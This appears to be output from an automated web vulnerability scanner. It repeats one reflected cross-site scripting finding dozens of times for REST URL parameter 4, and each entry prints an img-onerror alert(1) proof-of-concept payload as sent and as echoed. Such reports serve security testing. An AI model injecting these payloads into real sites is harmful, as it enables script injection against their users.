This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7564<img%20src%3da%20onerror%3dalert(1)>ae4a8344046 was submitted in the REST URL parameter 4. This input was echoed as d7564<img src=a onerror=alert(1)>ae4a8344046 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80c46<img%20src%3da%20onerror%3dalert(1)>de7e3ff4af6 was submitted in the REST URL parameter 4. This input was echoed as 80c46<img src=a onerror=alert(1)>de7e3ff4af6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7ba4<img%20src%3da%20onerror%3dalert(1)>e2aa5885018 was submitted in the REST URL parameter 4. This input was echoed as d7ba4<img src=a onerror=alert(1)>e2aa5885018 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3add1<img%20src%3da%20onerror%3dalert(1)>28f4f2fac2 was submitted in the REST URL parameter 4. This input was echoed as 3add1<img src=a onerror=alert(1)>28f4f2fac2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload afdad<img%20src%3da%20onerror%3dalert(1)>75e3f56b32f was submitted in the REST URL parameter 4. This input was echoed as afdad<img src=a onerror=alert(1)>75e3f56b32f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f7f7<img%20src%3da%20onerror%3dalert(1)>ad010335fe7 was submitted in the REST URL parameter 4. This input was echoed as 8f7f7<img src=a onerror=alert(1)>ad010335fe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ca3c<img%20src%3da%20onerror%3dalert(1)>f9e63221fc9 was submitted in the REST URL parameter 4. This input was echoed as 9ca3c<img src=a onerror=alert(1)>f9e63221fc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78570<img%20src%3da%20onerror%3dalert(1)>025efdce66a was submitted in the REST URL parameter 4. This input was echoed as 78570<img src=a onerror=alert(1)>025efdce66a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b04b3<img%20src%3da%20onerror%3dalert(1)>60a0eba2e53 was submitted in the REST URL parameter 4. This input was echoed as b04b3<img src=a onerror=alert(1)>60a0eba2e53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 68016<img%20src%3da%20onerror%3dalert(1)>2ef5a5bf0eb was submitted in the REST URL parameter 4. This input was echoed as 68016<img src=a onerror=alert(1)>2ef5a5bf0eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d8e6<img%20src%3da%20onerror%3dalert(1)>23eed6dea83 was submitted in the REST URL parameter 4. This input was echoed as 9d8e6<img src=a onerror=alert(1)>23eed6dea83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6d4c3<img%20src%3da%20onerror%3dalert(1)>e79e5035c5e was submitted in the REST URL parameter 4. This input was echoed as 6d4c3<img src=a onerror=alert(1)>e79e5035c5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f70be<img%20src%3da%20onerror%3dalert(1)>e7af45d49d9 was submitted in the REST URL parameter 4. This input was echoed as f70be<img src=a onerror=alert(1)>e7af45d49d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cffb6<img%20src%3da%20onerror%3dalert(1)>337232d97f9 was submitted in the REST URL parameter 4. This input was echoed as cffb6<img src=a onerror=alert(1)>337232d97f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95688<img%20src%3da%20onerror%3dalert(1)>9c4f9081633 was submitted in the REST URL parameter 4. This input was echoed as 95688<img src=a onerror=alert(1)>9c4f9081633 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 32fdf<img%20src%3da%20onerror%3dalert(1)>3a0ecae438c was submitted in the REST URL parameter 4. This input was echoed as 32fdf<img src=a onerror=alert(1)>3a0ecae438c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 96dcd<img%20src%3da%20onerror%3dalert(1)>49fb4dde708 was submitted in the REST URL parameter 4. This input was echoed as 96dcd<img src=a onerror=alert(1)>49fb4dde708 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6707c<img%20src%3da%20onerror%3dalert(1)>38418db140 was submitted in the REST URL parameter 4. This input was echoed as 6707c<img src=a onerror=alert(1)>38418db140 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e178<img%20src%3da%20onerror%3dalert(1)>49f933ea5e7 was submitted in the REST URL parameter 4. This input was echoed as 1e178<img src=a onerror=alert(1)>49f933ea5e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2106e<img%20src%3da%20onerror%3dalert(1)>e3a1d7ad873 was submitted in the REST URL parameter 4. This input was echoed as 2106e<img src=a onerror=alert(1)>e3a1d7ad873 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ed90<img%20src%3da%20onerror%3dalert(1)>99806ff0896 was submitted in the REST URL parameter 4. This input was echoed as 4ed90<img src=a onerror=alert(1)>99806ff0896 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f58d7<img%20src%3da%20onerror%3dalert(1)>7d70f72ae03 was submitted in the REST URL parameter 4. This input was echoed as f58d7<img src=a onerror=alert(1)>7d70f72ae03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4718<img%20src%3da%20onerror%3dalert(1)>bea69b6fa7f was submitted in the REST URL parameter 4. This input was echoed as f4718<img src=a onerror=alert(1)>bea69b6fa7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bd500<img%20src%3da%20onerror%3dalert(1)>63f1c2b1e91 was submitted in the REST URL parameter 4. This input was echoed as bd500<img src=a onerror=alert(1)>63f1c2b1e91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c2c8e<img%20src%3da%20onerror%3dalert(1)>48fe2b1cfa8 was submitted in the REST URL parameter 4. This input was echoed as c2c8e<img src=a onerror=alert(1)>48fe2b1cfa8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8212<img%20src%3da%20onerror%3dalert(1)>0c3e014616a was submitted in the REST URL parameter 4. This input was echoed as a8212<img src=a onerror=alert(1)>0c3e014616a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29dbe<img%20src%3da%20onerror%3dalert(1)>537d4a97d74 was submitted in the REST URL parameter 4. This input was echoed as 29dbe<img src=a onerror=alert(1)>537d4a97d74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b4ba<img%20src%3da%20onerror%3dalert(1)>151550698b2 was submitted in the REST URL parameter 4. This input was echoed as 9b4ba<img src=a onerror=alert(1)>151550698b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3b1e3<img%20src%3da%20onerror%3dalert(1)>4fa5924f20c was submitted in the REST URL parameter 4. This input was echoed as 3b1e3<img src=a onerror=alert(1)>4fa5924f20c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c989f<img%20src%3da%20onerror%3dalert(1)>b103b4531c7 was submitted in the REST URL parameter 4. This input was echoed as c989f<img src=a onerror=alert(1)>b103b4531c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 33297<img%20src%3da%20onerror%3dalert(1)>decb9bf7941 was submitted in the REST URL parameter 4. This input was echoed as 33297<img src=a onerror=alert(1)>decb9bf7941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5bcee<img%20src%3da%20onerror%3dalert(1)>c14eea029ba was submitted in the REST URL parameter 4. This input was echoed as 5bcee<img src=a onerror=alert(1)>c14eea029ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90828<img%20src%3da%20onerror%3dalert(1)>fe6a2201130 was submitted in the REST URL parameter 4. This input was echoed as 90828<img src=a onerror=alert(1)>fe6a2201130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e3b3c<img%20src%3da%20onerror%3dalert(1)>13da9e9c6eb was submitted in the REST URL parameter 4. This input was echoed as e3b3c<img src=a onerror=alert(1)>13da9e9c6eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8700b<img%20src%3da%20onerror%3dalert(1)>bdffb2a02a2 was submitted in the REST URL parameter 4. This input was echoed as 8700b<img src=a onerror=alert(1)>bdffb2a02a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 64f02<img%20src%3da%20onerror%3dalert(1)>b6c57a1461e was submitted in the REST URL parameter 4. This input was echoed as 64f02<img src=a onerror=alert(1)>b6c57a1461e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ee25<img%20src%3da%20onerror%3dalert(1)>3b765dcf0f was submitted in the REST URL parameter 4. This input was echoed as 2ee25<img src=a onerror=alert(1)>3b765dcf0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7774f<img%20src%3da%20onerror%3dalert(1)>c982e7ff168 was submitted in the REST URL parameter 4. This input was echoed as 7774f<img src=a onerror=alert(1)>c982e7ff168 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a1360<img%20src%3da%20onerror%3dalert(1)>b908ff5f0c7 was submitted in the REST URL parameter 4. This input was echoed as a1360<img src=a onerror=alert(1)>b908ff5f0c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2691d<img%20src%3da%20onerror%3dalert(1)>ff0958088bd was submitted in the REST URL parameter 4. This input was echoed as 2691d<img src=a onerror=alert(1)>ff0958088bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1cace<img%20src%3da%20onerror%3dalert(1)>1bd330bfb20 was submitted in the REST URL parameter 4. This input was echoed as 1cace<img src=a onerror=alert(1)>1bd330bfb20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15073<img%20src%3da%20onerror%3dalert(1)>f2ab600da00 was submitted in the REST URL parameter 4. This input was echoed as 15073<img src=a onerror=alert(1)>f2ab600da00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2a01c<img%20src%3da%20onerror%3dalert(1)>c59a7bb49cf was submitted in the REST URL parameter 4. This input was echoed as 2a01c<img src=a onerror=alert(1)>c59a7bb49cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 30a03<img%20src%3da%20onerror%3dalert(1)>b779fe1f7b9 was submitted in the REST URL parameter 4. This input was echoed as 30a03<img src=a onerror=alert(1)>b779fe1f7b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2df7<img%20src%3da%20onerror%3dalert(1)>13cbaaf6192 was submitted in the REST URL parameter 4. This input was echoed as d2df7<img src=a onerror=alert(1)>13cbaaf6192 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16b4a<img%20src%3da%20onerror%3dalert(1)>08531805115 was submitted in the REST URL parameter 4. This input was echoed as 16b4a<img src=a onerror=alert(1)>08531805115 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1aa81<img%20src%3da%20onerror%3dalert(1)>32a833d8e88 was submitted in the REST URL parameter 4. This input was echoed as 1aa81<img src=a onerror=alert(1)>32a833d8e88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae391<img%20src%3da%20onerror%3dalert(1)>b5d850ecb0a was submitted in the REST URL parameter 4. This input was echoed as ae391<img src=a onerror=alert(1)>b5d850ecb0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ad42<img%20src%3da%20onerror%3dalert(1)>34c513cf0a4 was submitted in the REST URL parameter 4. This input was echoed as 3ad42<img src=a onerror=alert(1)>34c513cf0a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ffe7a<img%20src%3da%20onerror%3dalert(1)>61eb2ed236 was submitted in the REST URL parameter 4. This input was echoed as ffe7a<img src=a onerror=alert(1)>61eb2ed236 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7c25<img%20src%3da%20onerror%3dalert(1)>bf4a77e9564 was submitted in the REST URL parameter 4. This input was echoed as a7c25<img src=a onerror=alert(1)>bf4a77e9564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb82c<img%20src%3da%20onerror%3dalert(1)>574c67e7dbe was submitted in the REST URL parameter 4. This input was echoed as bb82c<img src=a onerror=alert(1)>574c67e7dbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 27c18<img%20src%3da%20onerror%3dalert(1)>e49400a6971 was submitted in the REST URL parameter 4. This input was echoed as 27c18<img src=a onerror=alert(1)>e49400a6971 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2eb8d<img%20src%3da%20onerror%3dalert(1)>d5c30b3b792 was submitted in the REST URL parameter 4. This input was echoed as 2eb8d<img src=a onerror=alert(1)>d5c30b3b792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c44d2<img%20src%3da%20onerror%3dalert(1)>c9ec97fa83d was submitted in the REST URL parameter 4. This input was echoed as c44d2<img src=a onerror=alert(1)>c9ec97fa83d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0452<img%20src%3da%20onerror%3dalert(1)>04e3d076a29 was submitted in the REST URL parameter 4. This input was echoed as b0452<img src=a onerror=alert(1)>04e3d076a29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8217<img%20src%3da%20onerror%3dalert(1)>5ad7d86071 was submitted in the REST URL parameter 4. This input was echoed as c8217<img src=a onerror=alert(1)>5ad7d86071 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79f41<img%20src%3da%20onerror%3dalert(1)>5ccd163b7c8 was submitted in the REST URL parameter 4. This input was echoed as 79f41<img src=a onerror=alert(1)>5ccd163b7c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 755eb<img%20src%3da%20onerror%3dalert(1)>47067a17344 was submitted in the REST URL parameter 4. This input was echoed as 755eb<img src=a onerror=alert(1)>47067a17344 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1d143<img%20src%3da%20onerror%3dalert(1)>936e8defb60 was submitted in the REST URL parameter 4. This input was echoed as 1d143<img src=a onerror=alert(1)>936e8defb60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 69983<img%20src%3da%20onerror%3dalert(1)>f35ffca885f was submitted in the REST URL parameter 4. This input was echoed as 69983<img src=a onerror=alert(1)>f35ffca885f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83df9<img%20src%3da%20onerror%3dalert(1)>d9b39cf6009 was submitted in the REST URL parameter 4. This input was echoed as 83df9<img src=a onerror=alert(1)>d9b39cf6009 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d13e<img%20src%3da%20onerror%3dalert(1)>698417051a5 was submitted in the REST URL parameter 4. This input was echoed as 9d13e<img src=a onerror=alert(1)>698417051a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 99b97<img%20src%3da%20onerror%3dalert(1)>a15cb515776 was submitted in the REST URL parameter 4. This input was echoed as 99b97<img src=a onerror=alert(1)>a15cb515776 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6863f<img%20src%3da%20onerror%3dalert(1)>762e2322661 was submitted in the REST URL parameter 4. This input was echoed as 6863f<img src=a onerror=alert(1)>762e2322661 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eac13<img%20src%3da%20onerror%3dalert(1)>9cf9d655a9e was submitted in the REST URL parameter 4. This input was echoed as eac13<img src=a onerror=alert(1)>9cf9d655a9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7801f<img%20src%3da%20onerror%3dalert(1)>61f7452cf3c was submitted in the REST URL parameter 4. This input was echoed as 7801f<img src=a onerror=alert(1)>61f7452cf3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 947c7<img%20src%3da%20onerror%3dalert(1)>1af0a08797b was submitted in the REST URL parameter 4. This input was echoed as 947c7<img src=a onerror=alert(1)>1af0a08797b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1068d<img%20src%3da%20onerror%3dalert(1)>1d595725188 was submitted in the REST URL parameter 4. This input was echoed as 1068d<img src=a onerror=alert(1)>1d595725188 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e727<img%20src%3da%20onerror%3dalert(1)>7a30eede312 was submitted in the REST URL parameter 4. This input was echoed as 5e727<img src=a onerror=alert(1)>7a30eede312 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9f36<img%20src%3da%20onerror%3dalert(1)>5c1fecab3cd was submitted in the REST URL parameter 4. This input was echoed as a9f36<img src=a onerror=alert(1)>5c1fecab3cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7247c<img%20src%3da%20onerror%3dalert(1)>ddc992b41ad was submitted in the REST URL parameter 4. This input was echoed as 7247c<img src=a onerror=alert(1)>ddc992b41ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90a9c<img%20src%3da%20onerror%3dalert(1)>442113cd0c1 was submitted in the REST URL parameter 4. This input was echoed as 90a9c<img src=a onerror=alert(1)>442113cd0c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb28d<img%20src%3da%20onerror%3dalert(1)>55aeca0da2a was submitted in the REST URL parameter 4. This input was echoed as fb28d<img src=a onerror=alert(1)>55aeca0da2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcebf<img%20src%3da%20onerror%3dalert(1)>21784df730a was submitted in the REST URL parameter 4. This input was echoed as dcebf<img src=a onerror=alert(1)>21784df730a in the application's response.
